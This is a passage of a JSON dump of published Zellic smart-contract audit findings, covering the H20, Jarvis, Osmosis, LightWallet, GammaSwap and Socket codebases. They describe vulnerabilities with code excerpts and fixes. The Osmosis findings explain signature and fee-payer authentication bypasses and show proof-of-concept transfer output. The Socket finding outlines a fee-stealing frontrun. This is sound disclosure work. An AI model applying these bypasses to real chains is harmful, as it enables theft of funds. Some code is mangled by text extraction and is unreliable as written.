rewardTokens.length;) { rewards[i] = accounts[owner].rewards[rewardTokens[i]]; unchecked { ++i; } } return (accounts[owner].balance, accounts[owner].lockEpochs, accounts[owner].lastEpochPaid, rewards); } There are no security risks associated with this bug, but it could potentially cause confusion for users: the function may not accurately reflect the rewards that the user has accrued for tokens that are not currently in the reward tokens list. We recommend modifying the for loop to iterate over the accounts[owner].rewardTokens array as shown below: for (uint256 i = 0; i < accounts[owner].rewardTokens.length;) { address addr = accounts[owner].rewardTokens[i]; uint256 reward = accounts[owner].rewards[addr]; rewards[i] = reward; unchecked { ++i; } } The issue has been fixed by H20 in commit 81f252c5. Zellic H20", "html_url": "https://github.com/Zellic/publications/blob/master/H20 vlPSDN - Zellic Audit Report.pdf" }, { "title": "3.2 Centralization risk: reward token recovery", "labels": [ "Zellic" ], "body": " Target: LockRewards Category: Coding Mistakes Likelihood: Low Severity: Informational Impact: Informational In the recoverERC20 function, the owner can recover any ERC20 token excluding lockToken. In the recoverERC721 function, the owner can recover any ERC721 token. In the event that the owner\u2019s private key is compromised, an attacker could potentially steal all reward tokens that have not yet been claimed by users by whitelisting a token and calling the recoverERC20 function. The changeRecoverWhitelist function does contain a check to prevent the owner from removing the governance token: /** * @notice Add or remove a token from recover whitelist, * cannot whitelist governance token * @dev Only contract owner are allowed. Emits an event * allowing users to perceive the changes in contract rules. * The contract allows to whitelist the underlying tokens * (both lock token and rewards tokens). This can be exploited * by the owner to remove all funds deposited from all users.
* This is done bacause the owner is mean to be a multisig or * treasury wallet from a DAO * @param flag: set true to allow recover */ function changeRecoverWhitelist(address tokenAddress, bool flag) external onlyOwner { if (tokenAddress == lockToken) revert CannotWhitelistLockedToken(lockToken); if (tokenAddress == rewardTokens[0]) revert CannotWhitelistGovernanceToken(rewardTokens[0]); whitelistRecoverERC20[tokenAddress] = flag; emit ChangeERC20Whiltelist(tokenAddress, flag); } However, the check is ineffective because the owner can simply remove all tokens from rewardTokens using the removeReward function. This allows the owner to steal all reward funds. Use a multi-signature address wallet; this would prevent an attacker from causing economic damage if a private key were compromised. Set critical functions behind a timelock to catch malicious executions in the case of compromise. Prohibit withdrawal of reward tokens. H20 added a new role called PAUSE_SETTER_ROLE that is responsible for administering the pause and unpause functionality. Additionally, they have implemented the use of TimeLockController for ownership in commit 77d735f0. Zellic H20", "html_url": "https://github.com/Zellic/publications/blob/master/H20 vlPSDN - Zellic Audit Report.pdf" }, { "title": "3.1 migratePool results in loss of funds", "labels": [ "Zellic" ], "body": " Target: LendingStorageManager Category: Business Logic Likelihood: Low Severity: Medium Impact: High The lending storage manager includes a function to migrate the multiple liquidity pool to a new address; this function can only be called by the multiple liquidity pool. The migration function does not migrate critical accounting information such as the total number of synthetic tokens or the collateral assets of the liquidity providers. function migratePool(address oldPool, address newPool) external override nonReentrant onlyPoolFactory { ... // copy storage to new pool newPoolData.lendingModuleId = oldLendingId; newPoolData.collateral = oldPoolData.collateral; newPoolData.interestBearingToken = oldPoolData.interestBearingToken; newPoolData.jrtBuybackShare = oldPoolData.jrtBuybackShare; newPoolData.daoInterestShare = oldPoolData.daoInterestShare; newPoolData.collateralDeposited = oldPoolData.collateralDeposited; newPoolData.unclaimedDaoJRT = oldPoolData.unclaimedDaoJRT; newPoolData.unclaimedDaoCommission = oldPoolData.unclaimedDaoCommission; ... } The following critical accounting information in the pool is not migrated: contract SynthereumMultiLpLiquidityPool ... uint256 internal totalSyntheticAsset; ... mapping(address => LPPosition) internal lpPositions; ... The multiple liquidity pool currently does not implement a function calling the pool migration function; however, implementing a function calling the migration function in its current state would result in lost funds. We recommend removing the function until the implementation is corrected. We further note that fixing these issues will require more than just changing the migratePool(...) function in the lending storage manager; it will also require changes to be made in the multiple liquidity pool to update the field totalSyntheticAsset and to read and update the lpPositions mapping. Jarvis has made considerable efforts to address the concerns conveyed in this finding.
They have created a library for managing the pool migration, which appears to address the main concerns of (1) migrating LP-level collateral and token assets and (2) migrating total pool synthetic tokens. It is important to note, however, that this migration contract lies outside of the core scope of this audit and has hence not received the same level of scrutiny as the rest of the contracts. Furthermore, we have not been presented with an updated multiple liquidity pool contract that utilizes this library for pool migrations. Jarvis appears to be on the right track here, and we look forward to seeing a completed and safely implemented pool migration function in the future. Zellic Jarvis", "html_url": "https://github.com/Zellic/publications/blob/master/Jarvis Network Synthereum - Zellic Audit Report.pdf" }, { "title": "3.2 Swap lacks slippage and path checks", "labels": [ "Zellic" ], "body": " Target: Univ2JRTSwap Category: Business Logic Likelihood: Medium Severity: Low Impact: Medium The Uniswap module of swapping collateral into JRT does not support passing a parameter for the slippage check. amountOut = router.swapExactTokensForTokens( amountIn, 0, // no slippage check swapInfo.tokenSwapPath, recipient, swapInfo.expiration )[swapInfo.tokenSwapPath.length - 1]; Moreover, the last element of the swap\u2019s path is not checked to be the JRT token. The protocol may lose tokens due to overallowance of slippage, since the swap itself can get sandwich-attacked by front runners. This may heavily affect larger amounts of collateral being swapped. We recommend implementing the minTokensOut field in the SwapInfo and then passing that in the swap function call. amountOut = router.swapExactTokensForTokens( amountIn, swapInfo.minTokensOut, // slippage check passed swapInfo.tokenSwapPath, recipient, swapInfo.expiration )[swapInfo.tokenSwapPath.length - 1]; Moreover, similarly to the BalancerJRTSwap\u2019s SwapInfo struct, we recommend adding the jrtAddress field and checking it to match with the last index of the swap path, like so: ... uint256 swapLength = swapInfo.tokenSwapPath.length; require( swapInfo.tokenSwapPath[swapLength - 1] == jrtAddress, 'Wrong swap asset' ); ... Jarvis has sufficiently addressed the finding by introducing the necessary anti-slippage parameter and the required check that the last element of the swap path equals the address of the JRT token. Zellic Jarvis", "html_url": "https://github.com/Zellic/publications/blob/master/Jarvis Network Synthereum - Zellic Audit Report.pdf" }, { "title": "3.3 Centralization risk", "labels": [ "Zellic" ], "body": " Target: Project Wide, IFinder Category: Centralization Risk Likelihood: N/A Severity: Low Impact: Low The protocol relies heavily on the synthereum finder to provide the correct addresses for critical contract interactions such as the price feed, lending manager, lending storage manager, commission receiver, buy back program receiver, and the interest bearing token. For example, function _getPriceFeedRate( ISynthereumFinder _finder, bytes32 _priceIdentifier ) internal view returns (uint256) { ISynthereumPriceFeed priceFeed = ISynthereumPriceFeed( _finder.getImplementationAddress(SynthereumInterfaces.PriceFeed) ); return priceFeed.getLatestPrice(_priceIdentifier); } Although the function in _finder that manages the contract addresses is access controlled (as shown in the code below), compromised keys could result in exploitation.
For example, an attacker could change the priceFeed to a malicious contract. The compromised priceFeed could report a heavily depressed price to allow the attacker to mint a large number of synthetic tokens for very little collateral. The attacker could then massively increase the price to redeem synthetic tokens for a large amount of collateral, effectively draining the pool of its collateral assets. function changeImplementationAddress( bytes32 interfaceName, address implementationAddress ) external override onlyMaintainer { interfacesImplemented[interfaceName] = implementationAddress; emit InterfaceImplementationChanged(interfaceName, implementationAddress); } The use of a multisignature address wallet can prevent an attacker from causing economic damage in the event a private key is compromised. Timelocks can also be used to catch malicious executions, such as a change to the implementationAddress of the priceFeed. Jarvis is aware of the centralization risks introduced by the synthereum finder but emphasizes the importance of the synthereum finder in mitigating attacks from imposter contracts such as fake pools. They acknowledge that the synthereum finder could be compromised by leaked keys and, therefore, have implemented the following multistage protection protocol: 1. The synthereum finder is controlled by an Admin account and a Maintainer account. The Admin account controls the Admin and Maintainer roles while the Maintainer controls the addresses pointed to by the synthereum finder. In the event the Maintainer is compromised, the Admin role can revoke its rights. 2. Both the Admin and Maintainer roles are managed by two-of-four Gnosis Safe multisigs. 3. Ledger devices are used as signers of the multisigs to add an additional layer of security over hot wallets. Jarvis has further indicated that the Ledger keys are distributed among different company officers and are stored securely. In the future, the Admin and Maintainer roles will be moved to an on-chain DAO and the multisig will be upgraded to a three-of-five. At that time, time-lock mechanisms may also be introduced. Zellic Jarvis", "html_url": "https://github.com/Zellic/publications/blob/master/Jarvis Network Synthereum - Zellic Audit Report.pdf" }, { "title": "3.1 Signature authenticator authentication bypass", "labels": [ "Zellic" ], "body": " Target: x/authenticator/authenticator/ante.go Category: Coding Mistakes Likelihood: High Severity: Critical Impact: Critical For legacy support, the signature authenticator is used by default for any accounts without any registered authenticators. The signature authenticator implements the GetAuthenticationData handler for the Authenticator interface. The handler parses signers and signatures from the transaction and returns an indexed list of both the signers and the signatures. However, the message index is cast to int8 before the handler is invoked: authData, err := authenticator.GetAuthenticationData(neverWriteCacheCtx, tx, int8(msgIndex), simulate) if err != nil { return ctx, err } For transactions containing more than 128 messages, this causes the cast to overflow, resulting in the message index becoming negative. func GetSignersAndSignatures( msgs []sdk.Msg, suppliedSignatures []signing.SignatureV2, feePayer string, // we use the message index to get signers and signatures for // a specific message, with all messages. msgIndex int, ) ([]sdk.AccAddress, []signing.SignatureV2, error) { [...] // Iterate over messages and their signers.
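// NOTE: the caller passes int8(msgIndex), so for transactions with more than
// 128 messages the index wraps to a negative value before it reaches this
// loop; the specificMsg && i == msgIndex check below then never matches, and
// empty signer/signature lists are returned.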
for i, msg := range msgs { for _, signer := range msg.GetSigners() { [...] // If dealing with a specific message, capture its signers. if specificMsg && i == msgIndex { resultSigners = append(resultSigners, signer) } Since msgIndex is negative, specificMsg && i == msgIndex will never match. This causes GetSignersAndSignatures to return empty lists for signers and signatures. Signature checks are skipped for transactions having more than 128 messages. This could allow an attacker to maliciously sign and execute any message \u2014 for example, sending coins to themselves. They could simply add fake signature and signer info to the message, and it would get executed. An example proof of concept (POC), which is located in the appendix 7.1, was provided to Osmosis Labs that demonstrates an attacker signing a message to transfer coins to themselves: The POC will output the following: Balances before: hacker: amount: \u201d139621170\u201d denom: uosmo victim: amount: \u201d99351536125\u201d denom: uosmo { \u201dmsg_index\u201d: 128, \u201dlog\u201d: \u201d\u201d, \u201devents\u201d: [ { \u201dtype\u201d: \u201dcoin_received\u201d, \u201dattributes\u201d: [ { \u201dkey\u201d: \u201dreceiver\u201d, \u201dvalue\u201d: \u201dosmo1d6aldupd067vm4807qvkcm20j5ts2nmhzwu4y7\u201d }, { \u201dkey\u201d: \u201damount\u201d, \u201dvalue\u201d: \u201d10000000uosmo\u201d } ] }, { \u201dtype\u201d: \u201dcoin_spent\u201d, \u201dattributes\u201d: [ { \u201dkey\u201d: \u201dspender\u201d, \u201dvalue\u201d: \u201dosmo12smx2wdlyttvyzvzg54y2vnqwq2qjateuf7thj\u201d }, { \u201dkey\u201d: \u201damount\u201d, \u201dvalue\u201d: \u201d10000000uosmo\u201d } ] }, { \u201dtype\u201d: \u201dmessage\u201d, \u201dattributes\u201d: [ { \u201dkey\u201d: \u201daction\u201d, \u201dvalue\u201d: \u201d/cosmos.bank.v1beta1.MsgSend\u201d }, { \u201dkey\u201d: \u201dsender\u201d, \u201dvalue\u201d: \u201dosmo12smx2wdlyttvyzvzg54y2vnqwq2qjateuf7thj\u201d }, { \u201dkey\u201d: \u201dmodule\u201d, \u201dvalue\u201d: \u201dbank\u201d } ] }, { \u201dtype\u201d: \u201dtransfer\u201d, \u201dattributes\u201d: [ { \u201dkey\u201d: \u201drecipient\u201d, \u201dvalue\u201d: \u201dosmo1d6aldupd067vm4807qvkcm20j5ts2nmhzwu4y7\u201d }, { \u201dkey\u201d: \u201dsender\u201d, \u201dvalue\u201d: \u201dosmo12smx2wdlyttvyzvzg54y2vnqwq2qjateuf7thj\u201d }, { \u201dkey\u201d: \u201damount\u201d, \u201dvalue\u201d: \u201d10000000uosmo\u201d } ] } ] } Balances after: hacker: amount: \u201d149608670\u201d denom: uosmo victim: amount: \u201d99341536125\u201d denom: uosmo The int8 cast should be removed since it is not required. This issue has been acknowledged by Osmosis Labs, and a fix was implemented in commit 50eb8ae5. The int8 cast was removed for message indexes. Zellic Osmosis Labs", "html_url": "https://github.com/Zellic/publications/blob/master/Osmosis Authentication Abstraction - Zellic Audit Report.pdf" }, { "title": "3.2 Bypass fee payer authentication", "labels": [ "Zellic" ], "body": " Target: x/authenticator/ante/ante.go Category: Coding Mistakes Likelihood: High Severity: Critical Impact: Critical The authenticator\u2019s job is to validate the signature of a message and ensure that the required accounts have signed it, including the fee payer if one is specified.
When custom CosmWasm authenticators are added (or if an empty AllOfAuthenticator is used) then it is possible for an authenticator to be added that will return iface.Authenticated() regardless of whether the fee payer has signed the message or not: // Consume the authenticator's static gas cacheCtx.GasMeter().ConsumeGas(authenticator.StaticGas(), \u201dauthenticator static gas\u201d) // Get the authentication data for the transaction neverWriteCacheCtx, _ := cacheCtx.CacheContext() // GetAuthenticationData is not allowed to modify the state authData, err := authenticator.GetAuthenticationData(neverWriteCacheCtx, tx, msgIndex, simulate) if err != nil { return ctx, err } authentication := authenticator.Authenticate(cacheCtx, account, msg, authData) if authentication.IsRejected() { return ctx, authentication.Error() } if authentication.IsAuthenticated() { msgAuthenticated = true // Once the fee payer is authenticated, we can set the gas limit to its original value if !feePayerAuthenticated && account.Equals(feePayer) { originalGasMeter.ConsumeGas(payerGasMeter.GasConsumed(), \u201dfee payer gas\u201d) // Reset this for both contexts cacheCtx = ad.authenticatorKeeper.TransientStore. GetTransientContextWithGasMeter(originalGasMeter) ctx = ctx.WithGasMeter(originalGasMeter) feePayerAuthenticated = true } break } This will cause the entire fee to be deducted from the fee payer in the DeductFeeDecorator ante handler, but since the feePayerAuthenticated will not be set to true (account is based off the message\u2019s GetSigner, which will not match if a separate fee payer is specified), the amount of gas will be limited to 20,000. A malicious user can set up an authenticator to always verify any message, then send messages with high fees and a separate fee payer to drain any account of its funds. An example POC, which is located in the appendix 7.2, was provided to Osmosis Labs that demonstrates forcing someone to pay 100,0000 in fees without signing the message: The POC will output the following: Balances before: hacker (osmo1m6a73d0qhl9kphwx84syysnrr3t3myxvhw3f5d): amount: \u201d103875\u201d victim (osmo12smx2wdlyttvyzvzg54y2vnqwq2qjateuf7thj): amount: \u201d99362536125\u201d # transfer log { \u201dtype\u201d: \u201dtransfer\u201d, \u201dattributes\u201d: [ { \u201dkey\u201d: \u201drecipient\u201d, \u201dvalue\u201d: \u201dosmo17xpfvakm2amg962yls6f84z3kell8c5lczssa0\u201d, \u201dindex\u201d: false }, { \u201dkey\u201d: \u201dsender\u201d, \u201dvalue\u201d: \u201dosmo12smx2wdlyttvyzvzg54y2vnqwq2qjateuf7thj\u201d, \u201dindex\u201d: false }, { \u201dkey\u201d: \u201damount\u201d, \u201dvalue\u201d: \u201d1000000uosmo\u201d, \u201dindex\u201d: false } ] } Balances after: hacker: amount: \u201d103875\u201d victim: amount: \u201d99361536125\u201d The fee payer should always be authenticated regardless of the authenticator used. This issue has been acknowledged by Osmosis Labs, and a fix was implemented in commit 651eccd9. The fee payer is now always authenticated.
Zellic Osmosis Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Osmosis Authentication Abstraction - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Unnecessary casting of salt parameter", + "labels": [ + "Zellic" + ], + "body": "Target: LightWalletFactory Category: Optimizations Likelihood: N/A Severity: Informational : Informational The type of the parameter salt in the createAccount and getAddress functions is uint 256, but the functions both cast it to bytes32 in all uses of the parameter. The salt parameter\u2019s type can be directly set to bytes32, eliminating the need for type conversion within the functions: function createAccount(bytes32 hash, uint256 salt) public returns ( LightWallet ret) { function createAccount(bytes32 hash, bytes32 salt) public returns ( LightWallet ret) { address addr = getAddress(hash, salt); /) [...))] ret = LightWallet( payable( new ERC1967Proxy{salt : bytes32(salt)}( new ERC1967Proxy{salt : salt}( address(accountImplementation), abi.encodeCall(LightWallet.initialize, (hash)) ) ) ); } /) [...))] function getAddress(bytes32 hash, uint256 salt) public view returns ( Zellic Light, Inc. address) { function getAddress(bytes32 hash, bytes32 salt) public view returns ( address) { /) Computes the address with the given `salt`and the contract address `accountImplementation`, and with `initialize` method w/ `hash` return Create2.computeAddress( bytes32(salt), salt, keccak256( abi.encodePacked( type(ERC1967Proxy).creationCode, abi.encode(address(accountImplementation), abi.encodeCall(LightWallet.initialize, (hash))) ) ) ); } This issue has been acknowledged by Light, Inc., and a fix was implemented in commit 6a1a082e. Zellic Light, Inc. 4 Threat Model This provides a full threat model description for various functions. As time permit- ted, we analyzed each function in the contracts and created a written threat model for some critical functions. A threat model documents a given function\u2019s externally controllable inputs and how an attacker could leverage each input to cause harm. Not all functions in the audit scope may have been modeled. The absence of a threat model in this section does not necessarily suggest that a function is safe.", + "html_url": "https://github.com/Zellic/publications/blob/master/LightWallet - Zellic Audit Report.pdf" + }, + { + "title": "4.1 Module: LightWalletFactory.sol Function: createAccount(byte[32] byte[32], uint256 uint256) This is a helper function used to get the address of a deployed LightWallet contract or deploy a new one. Inputs", + "labels": [ + "Zellic" + ], + "body": "hash \u2013 Control: Full. \u2013 Constraints: None. \u2013 : Specifies the EntryPoint address the LightWallet should use. salt \u2013 Control: Full. \u2013 Constraints: None. \u2013 : Specifies the salt to use when deploying the proxy contract for LightWallet. Branches and code coverage (including function calls) Intended branches Account already exists \u2014 return existing LightWallet. 4\u25a1 Test coverage Account does not exist \u2014 create new LightWallet. 4\u25a1 Test coverage", + "html_url": "https://github.com/Zellic/publications/blob/master/LightWallet - Zellic Audit Report.pdf" + }, + { + "title": "4.2 Module: LightWallet.sol Zellic Light, Inc. Function: executeBatch(address[] dest, uint256[] value, byte[][] func) Executes a sequence of transactions (called directly by entryPoint). Inputs", + "labels": [ + "Zellic" + ], + "body": "dest \u2013 Control: Fully controlled by the user. \u2013 Constraints: N/A. 
\u2013 : The array of the address of the target contract to call. value \u2013 Control: Fully controlled by the user. \u2013 Constraints: N/A. \u2013 : The array of amount of Wei (ETH) to send along with the call. func \u2013 Control: Fully controlled by the user. \u2013 Constraints: N/A. \u2013 : The array of calldata to send to the target contract. Branches and code coverage (including function calls) Intended branches Tests that the account can run executeBatch correctly. 4\u25a1 Test coverage Tests that the account can run executeBatch correctly with value.length =) 0. 4\u25a1 Test coverage Negative behavior Tests that the account reverts when running executeBatch from a non-entryPoi nt. 4\u25a1 Negative test Tests that the account reverts when dest.length is not equal with func.length. \u25a1 Negative test Function call analysis executeBatch -> _call(address target, uint256 value, bytes memory data) -> target.call{value: value}(data) \u2013 What is controllable? target, value, and data. \u2013 If return value controllable, how is it used and how can it go wrong? N/A. \u2013 What happens if it reverts, reenters, or does other unusual control flow? Zellic Light, Inc. If there is a reentry attempt, the function will revert because the execute method is called from a non-entryPoint. Function: execute(address dest, uint256 value, byte[] func) Executes a transaction (called directly by entryPoint). Inputs dest \u2013 Control: Fully controlled by the user. \u2013 Constraints: N/A. \u2013 : The address of the target contract to call. value \u2013 Control: Fully controlled by the user. \u2013 Constraints: N/A. \u2013 : The amount of Wei (ETH) to send along with the call. func \u2013 Control: Fully controlled by the user. \u2013 Constraints: N/A. \u2013 : The calldata to send to the target contract. Branches and code coverage (including function calls) Intended branches Tests that the account can run execute correctly. 4\u25a1 Test coverage Negative behavior Tests that the account reverts when running execute from a non-entryPoint. 4\u25a1 Negative test Function call analysis execute -> _call(address target, uint256 value, bytes memory data) -> target.call{value: value}(data) \u2013 What is controllable? target, value, and data. \u2013 If return value controllable, how is it used and how can it go wrong? N/A. \u2013 What happens if it reverts, reenters, or does other unusual control flow? If there is a reentry attempt, the function will revert because the execute method is called from a non-entryPoint. Zellic Light, Inc. 5 Assessment Results At the time of our assessment, the reviewed code was not deployed to the Ethereum Mainnet. During our assessment on the scoped LightWallet contracts, we discovered one find- ing, which was informational in nature. Light, Inc. acknowledged the finding and im- plemented a fix.", + "html_url": "https://github.com/Zellic/publications/blob/master/LightWallet - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Vester incorrect burn", + "labels": [ + "Zellic" + ], + "body": "Target: VesterNoReserve Category: Business Logic Likelihood: High Severity: High : High Vesting is the process of locking tokens for a certain interval of time, after which the tokens are returned with rewards. The function _updateVesting, that is called to up- date vesting states burns esToken, which represent the users locked tokens, from the account. This is incorrect as locked esTokens are transferred to the Vesting contract when deposited. 
function _updateVesting(address _account) private { uint256 amount = _getNextClaimableAmount(_account); lastVestingTimes[_account] = block.timestamp; if (amount == 0) { return; } // transfer claimableAmount from balances to cumulativeClaimAmounts _burn(_account, amount); cumulativeClaimAmounts[_account] = cumulativeClaimAmounts[_account] + amount; IRestrictedToken(esToken).burn(_account, amount); } If a user deposits more than half of their esToken, they cannot claim or withdraw more tokens without acquiring more esToken, as the call will revert due to the lack of tokens during the burn. If the user has enough tokens to be burned (not deposited tokens), every time _updateVesting is called, their esTokens will be burned, receiving no tokens in return. Correct the logic to burn tokens from the Vester contract and not from the user. This issue has been acknowledged by GammaSwap, and a fix was implemented in commit a3672730. Zellic GammaSwap", "html_url": "https://github.com/Zellic/publications/blob/master/GammaSwap Staking - Zellic Audit Report.pdf" }, { "title": "3.2 Cancellation of isDepositToken still allows rewards to be claimed", "labels": [ "Zellic" ], "body": " Target: RewardTracker Category: Coding Mistakes Likelihood: Low Severity: Medium Impact: Medium The isDepositToken mapping is used to validate whether a token is whitelisted to be staked in the contract. function _stake(address _fundingAccount, address _account, address _depositToken, uint256 _amount) internal virtual { // ... require(isDepositToken[_depositToken], \u201dRewardTracker: invalid _depositToken\u201d); IERC20(_depositToken).safeTransferFrom(_fundingAccount, address(this), _amount); // ... } A similar check is performed upon unstaking of tokens. function _unstake(address _account, address _depositToken, uint256 _amount, address _receiver) internal virtual { // ... require(isDepositToken[_depositToken], \u201dRewardTracker: invalid _depositToken\u201d); // ... _burn(_account, _amount); IERC20(_depositToken).safeTransfer(_receiver, _amount); } Thus, if the isDepositToken mapping is set to false after previously being true, any amount of tokens that have been staked in the contract will not be able to be unstaked.
Zellic GammaSwap", + "html_url": "https://github.com/Zellic/publications/blob/master/GammaSwap Staking - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Check validity of parameters", + "labels": [ + "Zellic" + ], + "body": "Target: StakingRouter Category: Business Logic Likelihood: Low Severity: Informational : Informational Parameters such as the _gsPool in StakingRouter\u2019s functions could be checked for va- lidity. For example, function withdrawEsGsForPool(address _gsPool) external nonReentrant { IVester(poolTrackers[_gsPool].vester).withdrawForAccount(msg.sender); } lacks a check that the _gsPool is a valid address in the poolTrackers mapping. Failure to properly check the validity of parameters could lead to unexpected behav- ior, which in this case would have resulted in a failed external call. It is a good security practice to ensure the validity of parameters before using them, especially when these refer to arbitrary addresses. In the function above, the _gsPool parameter could be checked that it exists within the poolTrackers mapping. This would prevent the function from being called with an invalid _gsPool address. function withdrawEsGsForPool(address _gsPool) external nonReentrant { require(poolTrackers[_gsPool].vester !) address(0), \u201dStakingRouter: Pool not found\u201d); IVester(poolTrackers[_gsPool].vester).withdrawForAccount(msg.sender); } This issue has been acknowledged by GammaSwap. Zellic GammaSwap", + "html_url": "https://github.com/Zellic/publications/blob/master/GammaSwap Staking - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Switchboard can steal extra execution fees", + "labels": [ + "Zellic" + ], + "body": "Target: ExecutionManager Category: Business Logic Likelihood: Low Severity: High : Medium The payAndCheckFees function considers any fees left over after transmission fees, switchboard fees, and the minimum execution fees \u2014 the verification overhead fees added to msg.value transfer fees) \u2014 to be extra execution fees which can be optionally provided to encourage priority execution: if (msg.value >) type(uint128).max) revert InvalidMsgValue(); uint128 msgValue = uint128(msg.value); /) transmission fees are per packet, so need to divide by number of messages per packet transmissionFees = transmissionMinFees[transmitManager_][siblingChainSlug_] / uint128(maxPacketLength_); uint128 minMsgExecutionFees = _getMinFees( minMsgGasLimit_, payloadSize_, executionParams_, siblingChainSlug_ ); uint128 minExecutionFees = minMsgExecutionFees + verificationOverheadFees_; if (msgValue < transmissionFees + switchboardFees_ + minExecutionFees) revert InsufficientFees(); /) any extra fee is considered as executionFee executionFee = msgValue - transmissionFees - switchboardFees_; Zellic Socket Technology The switchboardFees_ and verificationOverheadFees_ both come from the switch- board when ISwitchboard.getMinFees is called to fetch the fees in SocketSrc (these values are passed into payAndCheckFees as arguments): /** * @notice Retrieves the minimum fees required for switchboard. * @param siblingChainSlug_ The slug of the destination chain for the message. * @param switchboard__ The switchboard address for which fees is retrieved. 
* @return switchboardFees fees required for message verification */ function _getSwitchboardMinFees( uint32 siblingChainSlug_, ISwitchboard switchboard__ ) internal view returns (uint128 switchboardFees, uint128 verificationOverheadFees) { (switchboardFees, verificationOverheadFees) = switchboard__.getMinFees( siblingChainSlug_ ); } A switchboard can return values from ISwitchboard.getMinFees such that the payAndCheckFees call does not revert with InsufficientFees but has no extra execution fee, thereby stealing from the executor and/or the user. The values can be configured in the on-chain switchboard by front-running the SocketSrc.outbound call. The following steps represent the simplest exploitation of this issue, where each top-level, numbered item represents a separate transaction: 1. The frontrunning transaction: Switchboard fees are increased. 2. The victim transaction: Fees were calculated off-chain in advance (including an extra fee). On-chain, the outbound call is made, and the switchboard steals the extra fee.
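As a worked example with purely hypothetical figures: from the code above, executionFee = msgValue - transmissionFees - switchboardFees_, and the call reverts only when msgValue < transmissionFees + switchboardFees_ + minExecutionFees. Suppose a user quotes 10 (transmission) + 20 (switchboard) + 70 (minimum execution) off-chain and sends msgValue = 110 to include an extra execution fee of 10. If the switchboard raises its fee to 30 before the outbound call lands, the revert condition 110 < 10 + 30 + 70 is still false, and executionFee = 110 - 10 - 30 = 70, the bare minimum, with the intended extra 10 absorbed by the switchboard.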
Zellic Socket Technology Alternatively, simply require the SocketSrc.outbound caller to specify an argu- ment for the amount of extra fees \u2014 if any \u2014 and add this value to the Insuffic ientFees check. The protocol is not directly at risk from this issue; the purpose of mitigating this issue would be to reduce risk and prevent potential harm to a user who does not sufficiently vet the plug\u2019s configured switchboard \u2014 or, since a plug implementation may allow a frontrunning attack to change the switchboard before the transaction, a user who does not sufficiently vet the plug. Socket Technology acknowledged the finding, noting that the system relies on repu- tation and that if a switchboard were to act maliciously, users would lose trust in the switchboard and/or the plug configured to use it: The Plugs are expected to only select Switchboards they trust after thoroughly vetting its fee mechanism. We agree that malicious behavior would cause users to lose trust in the switchboard and/or the plug. However, we believe risk is still presented to the system if the issue is exploitable even once, which is a possibility presently determined by the plug im- plementation and configured switchboard. Mitigating the issue prevents the plug and switchboard from creating the opportunity to exploit the user in the first place. Zellic Socket Technology", + "html_url": "https://github.com/Zellic/publications/blob/master/Socket Data Layer - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Unconstrained minMsgGasLimit unaccounted for in fees", + "labels": [ + "Zellic" + ], + "body": "Target: ExecutionManager Category: Coding Mistakes Likelihood: High Severity: Medium : Medium The minMsgGasLimit_ passed into the SocketSrc.outbound function specifies the mini- mum gas that the SocketDst.inbound executor must pass. The setting is passed into outbound, then follows this chain: 1. _validateAndSendFees(minMsgGasLimit_, ...))) 2. _executionManager.payAndCheckFees(minMsgGasLimit_, ...))) 3. _getMinFees(minMsgGasLimit_, ...))) Finally, _getMinFees drops this value; the first parameter is not named: function payAndCheckFees( uint256 minMsgGasLimit_, uint256 payloadSize_, bytes32 executionParams_, bytes32, /) Zellic: this is `_getMinFees` uint32 siblingChainSlug_, uint128 switchboardFees_, uint128 verificationOverheadFees_, address transmitManager_, address switchboard_, uint256 maxPacketLength_ ) { } external payable override returns (uint128 executionFee, uint128 transmissionFees) /) [...))] Zellic Socket Technology Nowhere along this chain are limits enforced on minMsgGasLimit, and the value is not used when calculating fees. The executor may take a loss if gas fees are high because of minMsgGasLimit. Addi- tionally, messages are not guaranteed to be deliverable on the data layer of Socket if the gas limit were too high. Note that this does not affect plugs; only executors are potentially negatively im- pacted. Account for the minMsgGasLimit in fees. Socket Technology acknowledged this finding, noting that the code is simply incom- plete in the assessment version and that fee accounting will be implemented in the future: For now minMsgGasLimit is part of packetMessage and it is used on destination side to check if provided executionGasLimit is enough. We plan to introduce detailed _getMinFees that would use both minMsgGasLimit and payloadSize. 
When we do it, the executionFees[siblingChainSlug_] that is present currently would break into parts, which would be multiplied with minMsgGasLimit and pay loadSize. Zellic Socket Technology", + "html_url": "https://github.com/Zellic/publications/blob/master/Socket Data Layer - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Arbitraging against Socket Data Layer", + "labels": [ + "Zellic" + ], + "body": "Target: ExecutionManager Category: Business Logic Likelihood: High Severity: Low : Low A feature of Socket Data Layer is the ability to send msg.value with messages cross- chain. This essentially acts as a swap from the source chain\u2019s native coin to that of the destination chain. The price of the source chain\u2019s native coin in terms of the destination chain\u2019s native coin is determined by a ratio set by the FEES_UPDATER_ROLE role. When paying fees for the message, the _getMinFees debits native tokens based on that ratio and the requested msgValue: /) decodes and validates the msg value if it is under given transfer limits and calculates /) the total fees needed for execution for given payload size and msg value. function _getMinFees( uint256, uint256 payloadSize_, bytes32 executionParams_, uint32 siblingChainSlug_ ) internal view returns (uint128) { /) [...))] uint256 params = uint256(executionParams_); uint8 paramType = uint8(params >) 248); if (paramType =) 0) return executionFees[siblingChainSlug_]; uint256 msgValue = uint256(uint248(params)); if (msgValue < msgValueMinThreshold[siblingChainSlug_]) revert MsgValueTooLow(); if (msgValue > msgValueMaxThreshold[siblingChainSlug_]) revert MsgValueTooHigh(); uint256 msgValueRequiredOnSrcChain = (relativeNativeTokenPrice[ siblingChainSlug_ Zellic Socket Technology ] * msgValue) / 1e18; /) [...))] } /) [...))] function setRelativeNativeTokenPrice( uint256 nonce_, uint32 siblingChainSlug_, uint256 relativeNativeTokenPrice_, bytes calldata signature_ ) external override { /) [...))] _checkRoleWithSlug(FEES_UPDATER_ROLE, siblingChainSlug_, feesUpdater); /) [...))] relativeNativeTokenPrice[siblingChainSlug_] = relativeNativeTokenPrice_; /) [...))] } There may be a delay between the fee updater\u2019s submission of the relative native token prices and the actual relative price. Arbitrage happens between at least two exchanges.[1] Socket Data Layer acts as one exchange, and any exchange (e.g., Uniswap, Curve, or even another Socket Data Layer path) may be used as the second. The core of the issue is that there is an arbitrage opportunity anytime the relative native token price difference between Socket Data Layer and another exchange is exploitable for profit (i.e., after fees), which is especially 